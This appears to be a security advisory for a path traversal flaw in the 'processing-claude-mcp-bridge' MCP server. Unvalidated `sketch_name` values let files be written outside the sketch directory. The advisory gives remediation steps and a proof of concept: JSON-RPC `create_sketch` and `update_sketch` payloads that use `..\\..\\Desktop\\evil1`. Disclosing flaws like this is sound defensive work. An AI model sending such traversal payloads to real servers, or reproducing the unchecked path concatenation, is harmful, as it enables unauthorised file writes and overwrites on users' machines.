# Arbitrary File Write Vulnerability Summary for processing-claude-mcp-bridge ## Vulnerability Overview **Vulnerability Name**: Arbitrary File Write via Sketch Name Traversal (`processing-claude-mcp-bridge`) **Vulnerability ID**: #1 **Report Date**: April 10, 2026 **Vulnerability Type**: CWE-22 / CWE-73 (Path Traversal / External Control of File Name or Path) **Severity**: CVSS v3.1 Base Score 8.6 (High) **Core Issue**: This tool allows for the creation, updating, and execution of Processing sketches. While the documentation states that `sketch_name` should only contain the sketch name, the implementation directly concatenates this value into a Windows filesystem path without verifying that the final path resides within the `PROCESSING_SKETCH_DIR`. Attackers can cause the server to create and write `.pde` files outside the expected Processing root directory by providing traversal sequences (e.g., `..\..\Desktop\evil1`). ## Impact Scope * **Affected Component**: `processing_server.py` * **Affected Versions**: Current scanned revision (as of the report date, April 10, 2026) * **Scope of Impact**: Any revision that directly concatenates `sketch_name` into filesystem paths without implementing normalization or directory enforcement. * **Attack Prerequisites**: * The attacker can invoke `create_sketch` or `update_sketch`. * The server runs on Windows, and the `sketch_name` field is unvalidated. * The service account has write permissions to the target directory outside the sandbox. * **Security Impact**: * **Integrity**: High. Attackers can create or overwrite files outside the Processing workspace. * **Availability**: Medium. Attackers can corrupt sketch files or interfere with user content in other directories. ## Remediation 1. **Input Validation**: Do not treat `sketch_name` as a simple name rather than a path. Reject path separators, drive prefixes, and traversal segments. 2. **Path Normalization**: Normalize the final path and enforce that it remains within `PROCESSING_SKETCH_DIR` before calling `os.makedirs`, `open`, `os.rename`, or during execution steps. 3. **Regression Testing**: Add regression tests for payloads such as `..\..\Desktop\evil1`, absolute paths, and mixed separator variants. 4. **Architectural Separation**: Consider completely decoupling sketch identifiers from their filesystem storage paths. 5. **Temporary Mitigation**: If immediate operational changes are necessary, restrict `sketch_name` to a conservative allowlist (e.g., letters, numbers, spaces, underscores, and hyphens). Run the server under a low-privilege account and store sketches in a dedicated directory that does not contain sensitive adjacent paths. ## Proof of Concept (POC) Code **1. Send MCP Request (JSON Payload)** ```json { "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "create_sketch", "arguments": { "sketch_name": "..\\..\\Desktop\\evil1", "code": "void setup() { size(100, 100); }" } } } ``` **2. Server Path Calculation (Python Logic)** ```python # Server calculation: sketch_dir = C:\Users\chelo\OneDrive\Documents\Processing\..\..\Desktop\evil1 sketch_file = C:\Users\chelo\OneDrive\Documents\Processing\..\..\Desktop\evil1\..\..\Desktop\evil1.pde # After normalization on Windows: C:\Users\chelo\OneDrive\Desktop\evil1 C:\Users\chelo\OneDrive\Desktop\evil1.pde ``` **3. Observable Results** The tool creates the folder `C:\Users\chelo\OneDrive\Desktop\evil1` and writes `C:\Users\chelo\OneDrive\Desktop\evil1.pde`, which is outside the expected Processing sketch directory. **4. Variant (Updating an Existing File)** ```json { "sketch_name": "..\\..\\evil1", "code": "void setup() { size(100, 100); }" } ``` *Note: `update_sketch` can use the same traversal pattern to overwrite existing escaped `.pde` files.*